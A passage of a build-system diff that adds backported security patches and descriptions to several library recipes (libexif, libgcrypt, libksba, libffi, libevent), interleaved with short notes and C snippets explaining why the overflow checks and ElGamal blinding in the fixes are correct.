+++ b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
@@ -0,0 +1,33 @@
+From dff8fd27edb23bc1486809186c6a4fe1f75f2179 Mon Sep 17 00:00:00 2001
+From: Yi Fan Yu <yifan.yu@windriver.com>
+Date: Thu, 22 Apr 2021 22:35:59 -0400
+Subject: [PATCH] test/regress.h: Increase default timeval tolerance 50 ms ->
+ 100 ms
+
+The default timeout tolerance is 50 ms,
+which causes intermittent failures in many of the
+related tests in arm64 QEMU.
+
+See: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14163
+(The root cause seems to be a heavy load)
+
+Upstream-Status: Submitted [https://github.com/libevent/libevent/pull/1157]
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
+---
+ test/regress.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/test/regress.h b/test/regress.h
+index f06a7669..829af4a7 100644
+--- a/test/regress.h
++++ b/test/regress.h
+@@ -127,7 +127,7 @@ int test_ai_eq_(const struct evutil_addrinfo *ai, const char *sockaddr_port,
+ tt_int_op(labs(timeval_msec_diff((tv1), (tv2)) - diff), <=, tolerance)
+
+ #define test_timeval_diff_eq(tv1, tv2, diff) \
+- test_timeval_diff_leq((tv1), (tv2), (diff), 50)
++ test_timeval_diff_leq((tv1), (tv2), (diff), 100)
+
+ long timeval_msec_diff(const struct timeval *start, const struct timeval *end);
+
diff --git a/meta/recipes-support/libevent/libevent_2.1.11.bb b/meta/recipes-support/libevent/libevent_2.1.11.bb
index fb186eb89f..75f9979c5b 100644
--- a/meta/recipes-support/libevent/libevent_2.1.11.bb
+++ b/meta/recipes-support/libevent/libevent_2.1.11.bb
@@ -1,4 +1,9 @@
SUMMARY = "An asynchronous event notification library"
+DESCRIPTION = "A software library that provides asynchronous event \
+notification. The libevent API provides a mechanism to execute a callback \
+function when a specific event occurs on a file descriptor or after a \
+timeout has been reached. libevent also supports callbacks triggered \
+by signals and regular timeouts"
HOMEPAGE = "http://libevent.org/"
BUGTRACKER = "https://github.com/libevent/libevent/issues"
SECTION = "libs"
@@ -10,6 +15,7 @@ SRC_URI = "https://github.com/libevent/libevent/releases/download/release-${PV}-
file://Makefile-missing-test-dir.patch \
file://run-ptest \
file://0001-test-regress_dns.c-patch-out-tests-that-require-a-wo.patch \
+ file://0002-test-regress.h-Increase-default-timeval-tolerance-50.patch \
"
SRC_URI[md5sum] = "7f35cfe69b82d879111ec0d7b7b1c531"
diff --git a/meta/recipes-support/libexif/files/CVE-2020-0198.patch b/meta/recipes-support/libexif/files/CVE-2020-0198.patch
new file mode 100644
index 0000000000..2a48844cb2
--- /dev/null
+++ b/meta/recipes-support/libexif/files/CVE-2020-0198.patch
@@ -0,0 +1,66 @@
+From ca71eda33fe8421f98fbe20eb4392473357c1c43 Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Wed, 30 Dec 2020 10:22:47 +0800
+Subject: [PATCH] fixed another unsigned integer overflow
+
+first fixed by google in android fork,
+https://android.googlesource.com/platform/external/libexif/+/1e187b62682ffab5003c702657d6d725b4278f16%5E%21/#F0
+
+(use a more generic overflow check method, also check second overflow instance.)
+
+https://security-tracker.debian.org/tracker/CVE-2020-0198
+
+Upstream-Status: Backport[https://github.com/libexif/libexif/commit/ce03ad7ef4e8aeefce79192bf5b6f69fae396f0c]
+CVE: CVE-2020-0198
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ libexif/exif-data.c | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/libexif/exif-data.c b/libexif/exif-data.c
+index 8b280d3..34d58fc 100644
+--- a/libexif/exif-data.c
++++ b/libexif/exif-data.c
+@@ -47,6 +47,8 @@
+ #undef JPEG_MARKER_APP1
+ #define JPEG_MARKER_APP1 0xe1
+
++#define CHECKOVERFLOW(offset,datasize,structsize) (( offset >= datasize) || (structsize > datasize) || (offset > datasize - structsize ))
++
+ static const unsigned char ExifHeader[] = {0x45, 0x78, 0x69, 0x66, 0x00, 0x00};
+
+ struct _ExifDataPrivate
+@@ -327,7 +329,7 @@ exif_data_load_data_thumbnail (ExifData *data, const unsigned char *d,
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail offset (%u).", o);
+ return;
+ }
+- if (s > ds - o) {
++ if (CHECKOVERFLOW(o,ds,s)) {
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData", "Bogus thumbnail size (%u), max would be %u.", s, ds-o);
+ return;
+ }
+@@ -420,9 +422,9 @@ exif_data_load_data_content (ExifData *data, ExifIfd ifd,
+ }
+
+ /* Read the number of entries */
+- if ((offset + 2 < offset) || (offset + 2 < 2) || (offset + 2 > ds)) {
++ if (CHECKOVERFLOW(offset, ds, 2)) {
+ exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
+- "Tag data past end of buffer (%u > %u)", offset+2, ds);
++ "Tag data past end of buffer (%u+2 > %u)", offset, ds);
+ return;
+ }
+ n = exif_get_short (d + offset, data->priv->order);
+@@ -431,7 +433,7 @@ exif_data_load_data_content (ExifData *data, ExifIfd ifd,
+ offset += 2;
+
+ /* Check if we have enough data. */
+- if (offset + 12 * n > ds) {
++ if (CHECKOVERFLOW(offset, ds, 12*n)) {
+ n = (ds - offset) / 12;
+ exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
+ "Short data; only loading %hu entries...", n);
+--
+2.17.1
+
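
Note: the CHECKOVERFLOW macro above never computes 'offset + structsize'. Its first two clauses establish 'offset < datasize' and 'structsize <= datasize', so 'datasize - structsize' cannot wrap, and 'offset > datasize - structsize' is then an overflow-free way of asking whether 'offset + structsize > datasize'. A small standalone demonstration of why the naive form fails (illustrative values only):

    #include <stdio.h>

    #define CHECKOVERFLOW(offset, datasize, structsize) \
        (((offset) >= (datasize)) || ((structsize) > (datasize)) || \
         ((offset) > (datasize) - (structsize)))

    int main(void)
    {
        unsigned int ds = 100;              /* buffer size */
        unsigned int offset = 0xFFFFFFFEu;  /* attacker-controlled offset */
        unsigned int need = 12;             /* bytes we want to read */

        /* Naive test: offset + need wraps to 10, which is <= ds, so the
         * bogus offset slips through. */
        printf("naive: %s\n", (offset + need > ds) ? "rejected" : "accepted (bug)");

        /* Rearranged test never overflows and rejects it. */
        printf("macro: %s\n", CHECKOVERFLOW(offset, ds, need) ? "rejected" : "accepted");
        return 0;
    }
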
diff --git a/meta/recipes-support/libexif/files/CVE-2020-0452.patch b/meta/recipes-support/libexif/files/CVE-2020-0452.patch
new file mode 100644
index 0000000000..a117b8b369
--- /dev/null
+++ b/meta/recipes-support/libexif/files/CVE-2020-0452.patch
@@ -0,0 +1,39 @@
+From 302acd49eba0a125b0f20692df6abc6f7f7ca53e Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Wed, 30 Dec 2020 10:18:51 +0800
+Subject: [PATCH] fixed an incorrect overflow check that could be optimized
+ away.
+
+inspired by:
+https://android.googlesource.com/platform/external/libexif/+/8e7345f3bc0bad06ac369d6cbc1124c8ceaf7d4b
+
+https://source.android.com/security/bulletin/2020-11-01
+
+CVE-2020-0452
+
+Upstream-Status: Backport [https://github.com/libexif/libexif/commit/9266d14b5ca4e29b970fa03272318e5f99386e06]
+CVE: CVE-2020-0452
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ libexif/exif-entry.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libexif/exif-entry.c b/libexif/exif-entry.c
+index 5de215f..3a6ce84 100644
+--- a/libexif/exif-entry.c
++++ b/libexif/exif-entry.c
+@@ -1371,8 +1371,8 @@ exif_entry_get_value (ExifEntry *e, char *val, unsigned int maxlen)
+ {
+ unsigned char *utf16;
+
+- /* Sanity check the size to prevent overflow */
+- if (e->size+sizeof(uint16_t)+1 < e->size) break;
++ /* Sanity check the size to prevent overflow. Note EXIF files are 64kb at most. */
++ if (e->size >= 65536 - sizeof(uint16_t)*2) break;
+
+ /* The tag may not be U+0000-terminated , so make a local
+ U+0000-terminated copy before converting it */
+--
+2.17.1
+
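
Note: the replaced test 'e->size + sizeof(uint16_t) + 1 < e->size' was meant as a wrap-around check, but sizeof(uint16_t) has type size_t, so on common LP64 targets the sum is evaluated in 64 bits, never wraps, and the condition is always false, which is exactly the kind of dead check a compiler may drop. The new test bounds e->size against the 64 KiB EXIF limit instead. A small demonstration (illustrative values; the behaviour described assumes a 64-bit size_t):

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        unsigned int size = 0xFFFFFFFFu;   /* largest possible e->size */

        /* Old-style test: with a 64-bit size_t the sum cannot be smaller
         * than 'size', so this prints 0 and the test is effectively dead. */
        printf("old check fires: %d\n", size + sizeof(uint16_t) + 1 < size);

        /* New-style test: compare against an explicit bound instead
         * (EXIF payloads cannot exceed 64 KiB). */
        printf("new check fires: %d\n", size >= 65536 - sizeof(uint16_t) * 2);
        return 0;
    }
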
diff --git a/meta/recipes-support/libexif/libexif_0.6.22.bb b/meta/recipes-support/libexif/libexif_0.6.22.bb
index a520d5c9f9..86d4464253 100644
--- a/meta/recipes-support/libexif/libexif_0.6.22.bb
+++ b/meta/recipes-support/libexif/libexif_0.6.22.bb
@@ -1,4 +1,7 @@
SUMMARY = "Library for reading extended image information (EXIF) from JPEG files"
+DESCRIPTION = "libexif is a library for parsing, editing, and saving EXIF data. It is \
+intended to replace lots of redundant implementations in command-line \
+utilities and programs with GUIs."
HOMEPAGE = "https://libexif.github.io/"
SECTION = "libs"
LICENSE = "LGPLv2.1"
@@ -8,6 +11,8 @@ def version_underscore(v):
return "_".join(v.split("."))
SRC_URI = "https://github.com/libexif/libexif/releases/download/libexif-${@version_underscore("${PV}")}-release/libexif-${PV}.tar.xz \
+ file://CVE-2020-0198.patch \
+ file://CVE-2020-0452.patch \
"
SRC_URI[sha256sum] = "5048f1c8fc509cc636c2f97f4b40c293338b6041a5652082d5ee2cf54b530c56"
diff --git a/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch b/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch
new file mode 100644
index 0000000000..782dce70d8
--- /dev/null
+++ b/meta/recipes-support/libffi/libffi/0001-arm-sysv-reverted-clang-VFP-mitigation.patch
@@ -0,0 +1,104 @@
+From 501a6b55853af549fae72723e74271f2a4ec7cf6 Mon Sep 17 00:00:00 2001
+From: Brett Warren <brett.warren@arm.com>
+Date: Fri, 27 Nov 2020 15:28:42 +0000
+Subject: [PATCH] arm/sysv: reverted clang VFP mitigation
+
+Since commit e3d2812ce43940aacae5bab2d0e965278cb1e7ea,
+separate instructions were used when compiling under clang,
+as clang didn't allow the directives at the time. This mitigation
+now causes compilation to fail under clang 10, as described by
+https://github.com/libffi/libffi/issues/607. Now that
+clang supports the LDC and SDC instructions, this mitigation
+has been reverted.
+
+Upstream-Status: Pending
+Signed-off-by: Brett Warren <brett.warren@arm.com>
+---
+ src/arm/sysv.S | 33 ---------------------------------
+ 1 file changed, 33 deletions(-)
+
+diff --git a/src/arm/sysv.S b/src/arm/sysv.S
+index 63180a4..e3ce526 100644
+--- a/src/arm/sysv.S
++++ b/src/arm/sysv.S
+@@ -128,13 +128,8 @@ ARM_FUNC_START(ffi_call_VFP)
+ cfi_startproc
+
+ cmp r3, #3 @ load only d0 if possible
+-#ifdef __clang__
+- vldrle d0, [sp]
+- vldmgt sp, {d0-d7}
+-#else
+ ldcle p11, cr0, [r0] @ vldrle d0, [sp]
+ ldcgt p11, cr0, [r0], {16} @ vldmgt sp, {d0-d7}
+-#endif
+ add r0, r0, #64 @ discard the vfp register args
+ /* FALLTHRU */
+ ARM_FUNC_END(ffi_call_VFP)
+@@ -172,25 +167,13 @@ ARM_FUNC_START(ffi_call_SYSV)
+ nop
+ 0:
+ E(ARM_TYPE_VFP_S)
+-#ifdef __clang__
+- vstr s0, [r2]
+-#else
+ stc p10, cr0, [r2] @ vstr s0, [r2]
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_VFP_D)
+-#ifdef __clang__
+- vstr d0, [r2]
+-#else
+ stc p11, cr0, [r2] @ vstr d0, [r2]
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_VFP_N)
+-#ifdef __clang__
+- vstm r2, {d0-d3}
+-#else
+ stc p11, cr0, [r2], {8} @ vstm r2, {d0-d3}
+-#endif
+ pop {fp,pc}
+ E(ARM_TYPE_INT64)
+ str r1, [r2, #4]
+@@ -287,11 +270,7 @@ ARM_FUNC_START(ffi_closure_VFP)
+ add ip, sp, #16
+ sub sp, sp, #64+32 @ allocate frame
+ cfi_adjust_cfa_offset(64+32)
+-#ifdef __clang__
+- vstm sp, {d0-d7}
+-#else
+ stc p11, cr0, [sp], {16} @ vstm sp, {d0-d7}
+-#endif
+ stmdb sp!, {ip,lr}
+
+ /* See above. */
+@@ -320,25 +299,13 @@ ARM_FUNC_START_LOCAL(ffi_closure_ret)
+ cfi_rel_offset(lr, 4)
+ 0:
+ E(ARM_TYPE_VFP_S)
+-#ifdef __clang__
+- vldr s0, [r2]
+-#else
+ ldc p10, cr0, [r2] @ vldr s0, [r2]
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_VFP_D)
+-#ifdef __clang__
+- vldr d0, [r2]
+-#else
+ ldc p11, cr0, [r2] @ vldr d0, [r2]
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_VFP_N)
+-#ifdef __clang__
+- vldm r2, {d0-d3}
+-#else
+ ldc p11, cr0, [r2], {8} @ vldm r2, {d0-d3}
+-#endif
+ ldm sp, {sp,pc}
+ E(ARM_TYPE_INT64)
+ ldr r1, [r2, #4]
+--
+2.17.1
+
diff --git a/meta/recipes-support/libffi/libffi_3.3.bb b/meta/recipes-support/libffi/libffi_3.3.bb
index 9dfdb9e39b..10ef003242 100644
--- a/meta/recipes-support/libffi/libffi_3.3.bb
+++ b/meta/recipes-support/libffi/libffi_3.3.bb
@@ -13,6 +13,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=492385fe22195952f5b9b197868ba268"
SRC_URI = "https://github.com/libffi/libffi/releases/download/v${PV}/${BPN}-${PV}.tar.gz \
file://not-win32.patch \
file://0001-Fixed-missed-ifndef-for-__mips_soft_float.patch \
+ file://0001-arm-sysv-reverted-clang-VFP-mitigation.patch \
file://0001-powerpc-fix-build-failure-on-power7-and-older-532.patch \
file://0001-Address-platforms-with-no-__int128.patch \
file://0001-Address-platforms-with-no-__int128-part2.patch \
diff --git a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
index 85102a1a3d..8971486715 100644
--- a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for file management"
+DESCRIPTION = "Contains a library and other files required by menu-cache-gen libexec of menu-cache-1.1.0. "
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/libfm/libfm_1.3.1.bb b/meta/recipes-support/libfm/libfm_1.3.1.bb
index 63ae7874b9..b6f9df0c55 100644
--- a/meta/recipes-support/libfm/libfm_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm_1.3.1.bb
@@ -1,4 +1,6 @@
SUMMARY = "Library for file management"
+DESCRIPTION = "LibFM provides file management functions built on top of Glib/GIO \
+giving a convenient higher-level API."
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "GPLv2+ & LGPLv2+"
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
new file mode 100644
index 0000000000..bf26486d8b
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
@@ -0,0 +1,77 @@
+From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Tue, 13 Apr 2021 10:00:00 +0900
+Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding
+ too.
+
+* cipher/elgamal.c (do_encrypt): Also do exponent blinding.
+
+--
+
+Base blinding had been introduced with USE_BLINDING. This patch add
+exponent blinding as well to mitigate side-channel attack on mpi_powm.
+
+GnuPG-bug-id: 5328
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33560
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ cipher/elgamal.c | 20 +++++++++++++++++---
+ 1 file changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..9835122f 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ static void
+ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+ {
+- gcry_mpi_t t1, t2, r;
++ gcry_mpi_t t1, t2, r, r1, h;
+ unsigned int nbits = mpi_get_nbits (skey->p);
++ gcry_mpi_t x_blind;
+
+ mpi_normalize (a);
+ mpi_normalize (b);
+@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
+
+ t2 = mpi_snew (nbits);
+ r = mpi_new (nbits);
++ r1 = mpi_new (nbits);
++ h = mpi_new (nbits);
++ x_blind = mpi_snew (nbits);
+
+ /* We need a random number of about the prime size. The random
+ number merely needs to be unpredictable; thus we use level 0. */
+ _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM);
+
++ /* Also, exponent blinding: x_blind = x + (p-1)*r1 */
++ _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM);
++ mpi_set_highbit (r1, nbits - 1);
++ mpi_sub_ui (h, skey->p, 1);
++ mpi_mul (x_blind, h, r1);
++ mpi_add (x_blind, skey->x, x_blind);
++
+ /* t1 = r^x mod p */
+- mpi_powm (t1, r, skey->x, skey->p);
++ mpi_powm (t1, r, x_blind, skey->p);
+ /* t2 = (a * r)^-x mod p */
+ mpi_mulm (t2, a, r, skey->p);
+- mpi_powm (t2, t2, skey->x, skey->p);
++ mpi_powm (t2, t2, x_blind, skey->p);
+ mpi_invm (t2, t2, skey->p);
+ /* t1 = (t1 * t2) mod p*/
+ mpi_mulm (t1, t1, t2, skey->p);
+
++ mpi_free (x_blind);
++ mpi_free (h);
++ mpi_free (r1);
+ mpi_free (r);
+ mpi_free (t2);
+
+--
+2.11.0
+
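
Note: the blinding above leaves the decryption result unchanged because the exponent is only shifted by a multiple of the group order. With a prime modulus p, Fermat's little theorem gives a^(p-1) = 1 (mod p) for any a not divisible by p, so for x_blind = x + (p-1)*r1:

    a^x_blind = a^x * (a^(p-1))^r1 = a^x * 1^r1 = a^x   (mod p)

t1 and t2 therefore take the same values as before, while the bit pattern fed to mpi_powm changes on every call, which is what frustrates the side-channel attack on the modular exponentiation.
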
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
new file mode 100644
index 0000000000..b3a18bc5aa
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
@@ -0,0 +1,109 @@
+From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001
+From: NIIBE Yutaka <gniibe@fsij.org>
+Date: Fri, 21 May 2021 11:15:07 +0900
+Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations.
+
+* cipher/elgamal.c (gen_k): Remove support of smaller K.
+(do_encrypt): Never use smaller K.
+(sign): Follow the change of gen_k.
+
+--
+
+Cherry-pick master commit of:
+ 632d80ef30e13de6926d503aa697f92b5dbfbc5e
+
+This change basically reverts encryption changes in two commits:
+
+ 74386120dad6b3da62db37f7044267c8ef34689b
+ 78531373a342aeb847950f404343a05e36022065
+
+Use of smaller K for ephemeral key in ElGamal encryption is only good,
+when we can guarantee that recipient's key is generated by our
+implementation (or compatible).
+
+For detail, please see:
+
+ Luca De Feo, Bertram Poettering, Alessandro Sorniotti,
+ "On the (in)security of ElGamal in OpenPGP";
+ in the proceedings of CCS'2021.
+
+CVE-id: CVE-2021-33560
+GnuPG-bug-id: 5328
+Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti
+Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-40528
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+---
+ cipher/elgamal.c | 24 ++++++------------------
+ 1 file changed, 6 insertions(+), 18 deletions(-)
+
+diff --git a/cipher/elgamal.c b/cipher/elgamal.c
+index 4eb52d62..ae7a631e 100644
+--- a/cipher/elgamal.c
++++ b/cipher/elgamal.c
+@@ -66,7 +66,7 @@ static const char *elg_names[] =
+
+
+ static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie);
+-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k);
++static gcry_mpi_t gen_k (gcry_mpi_t p);
+ static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits,
+ gcry_mpi_t **factors);
+ static int check_secret_key (ELG_secret_key *sk);
+@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie )
+
+ /****************
+ * Generate a random secret exponent k from prime p, so that k is
+- * relatively prime to p-1. With SMALL_K set, k will be selected for
+- * better encryption performance - this must never be used signing!
++ * relatively prime to p-1.
+ */
+ static gcry_mpi_t
+-gen_k( gcry_mpi_t p, int small_k )
++gen_k( gcry_mpi_t p )
+ {
+ gcry_mpi_t k = mpi_alloc_secure( 0 );
+ gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) );
+@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k )
+ unsigned int nbits, nbytes;
+ char *rndbuf = NULL;
+
+- if (small_k)
+- {
+- /* Using a k much lesser than p is sufficient for encryption and
+- * it greatly improves the encryption performance. We use
+- * Wiener's table and add a large safety margin. */
+- nbits = wiener_map( orig_nbits ) * 3 / 2;
+- if( nbits >= orig_nbits )
+- BUG();
+- }
+- else
+- nbits = orig_nbits;
+-
++ nbits = orig_nbits;
+
+ nbytes = (nbits+7)/8;
+ if( DBG_CIPHER )
+@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
+ * error code.
+ */
+
+- k = gen_k( pkey->p, 1 );
++ k = gen_k( pkey->p );
+ mpi_powm (a, pkey->g, k, pkey->p);
+
+ /* b = (y^k * input) mod p
+@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey )
+ *
+ */
+ mpi_sub_ui(p_1, p_1, 1);
+- k = gen_k( skey->p, 0 /* no small K ! */ );
++ k = gen_k( skey->p );
+ mpi_powm( a, skey->g, k, skey->p );
+ mpi_mul(t, skey->x, a );
+ mpi_subm(t, input, t, p_1 );
+--
+2.30.2
+
diff --git a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
index 4e0eb0a169..8045bab9ed 100644
--- a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
+++ b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
@@ -1,4 +1,7 @@
SUMMARY = "General purpose cryptographic library based on the code from GnuPG"
+DESCRIPTION = "A cryptography library developed as a separated module of GnuPG. \
+It can also be used independently of GnuPG, but depends on its error-reporting \
+library Libgpg-error."
HOMEPAGE = "http://directory.fsf.org/project/libgcrypt/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
SECTION = "libs"
@@ -25,10 +28,15 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \
file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \
file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \
file://determinism.patch \
+ file://CVE-2021-33560.patch \
+ file://CVE-2021-40528.patch \
"
SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743"
SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3"
+# Below whitelisted CVEs are disputed and not affecting crypto libraries for any distro.
+CVE_CHECK_WHITELIST += "CVE-2018-12433 CVE-2018-12438"
+
BINCONFIG = "${bindir}/libgcrypt-config"
inherit autotools texinfo binconfig-disabled pkgconfig
diff --git a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
index b9a2b01c20..7b7404b516 100644
--- a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
+++ b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
@@ -1,4 +1,5 @@
SUMMARY = "Small library that defines common error values for all GnuPG components"
+DESCRIPTION = "Contains common error codes and error handling functions used by GnuPG, Libgcrypt, GPGME and more packages. "
HOMEPAGE = "http://www.gnupg.org/related_software/libgpg-error/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
diff --git a/meta/recipes-support/libical/libical_3.0.7.bb b/meta/recipes-support/libical/libical_3.0.7.bb
index a50473e9ec..170f12b7a9 100644
--- a/meta/recipes-support/libical/libical_3.0.7.bb
+++ b/meta/recipes-support/libical/libical_3.0.7.bb
@@ -1,4 +1,8 @@
SUMMARY = "iCal and scheduling (RFC 2445, 2446, 2447) library"
+DESCRIPTION = "An Open Source implementation of the iCalendar protocols \
+and protocol data units. The iCalendar specification describes how \
+calendar clients can communicate with calendar servers so users can store \
+their calendar data and arrange meetings with other users. "
HOMEPAGE = "https://github.com/libical/libical"
BUGTRACKER = "https://github.com/libical/libical/issues"
LICENSE = "LGPLv2.1 | MPL-2.0"
diff --git a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
index 710ef0172d..841edc6829 100644
--- a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
+++ b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \
file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \
file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \
"
-SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \
+SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \
file://0001-Makefile-cleanup-install-for-rebuilds.patch \
file://0001-Make-man-pages-reproducible.patch"
SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba"
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
new file mode 100644
index 0000000000..ff9f2f9275
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
@@ -0,0 +1,47 @@
+From 4b7d9cd4a018898d7714ce06f3faf2626c14582b Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Wed, 5 Oct 2022 14:19:06 +0200
+Subject: [PATCH] Detect a possible overflow directly in the TLV parser.
+
+* src/ber-help.c (_ksba_ber_read_tl): Check for overflow of a commonly
+used sum.
+--
+
+It is quite common to have checks like
+
+ if (ti.nhdr + ti.length >= DIM(tmpbuf))
+ return gpg_error (GPG_ERR_TOO_LARGE);
+
+This patch detects possible integer overflows immediately when
+creating the TI object.
+
+Reported-by: ZDI-CAN-18927, ZDI-CAN-18928, ZDI-CAN-18929
+
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=patch;h=4b7d9cd4a018898d7714ce06f3faf2626c14582b]
+CVE: CVE-2022-3515
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/ber-help.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/ber-help.c b/src/ber-help.c
+index 81c31ed..56efb6a 100644
+--- a/src/ber-help.c
++++ b/src/ber-help.c
+@@ -182,6 +182,12 @@ _ksba_ber_read_tl (ksba_reader_t reader, struct tag_info *ti)
+ ti->length = len;
+ }
+
++ if (ti->length > ti->nhdr && (ti->nhdr + ti->length) < ti->length)
++ {
++ ti->err_string = "header+length would overflow";
++ return gpg_error (GPG_ERR_EOVERFLOW);
++ }
++
+ /* Without this kludge some example certs can't be parsed */
+ if (ti->class == CLASS_UNIVERSAL && !ti->tag)
+ ti->length = 0;
+--
+2.11.0
+
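
Note: the added test is the standard unsigned wrap-around detector: for unsigned operands, a + b overflows exactly when the wrapped result is smaller than either operand, and the arithmetic itself is well defined. A self-contained illustration (not libksba code):

    #include <stdio.h>
    #include <stddef.h>

    /* Returns 1 when a + b would wrap around for size_t operands. */
    static int add_would_overflow(size_t a, size_t b)
    {
        return a + b < a;   /* well-defined for unsigned types */
    }

    int main(void)
    {
        size_t nhdr = 16;
        size_t len = (size_t)-1 - 4;    /* deliberately huge length */

        if (add_would_overflow(nhdr, len))
            printf("header+length would overflow\n");
        else
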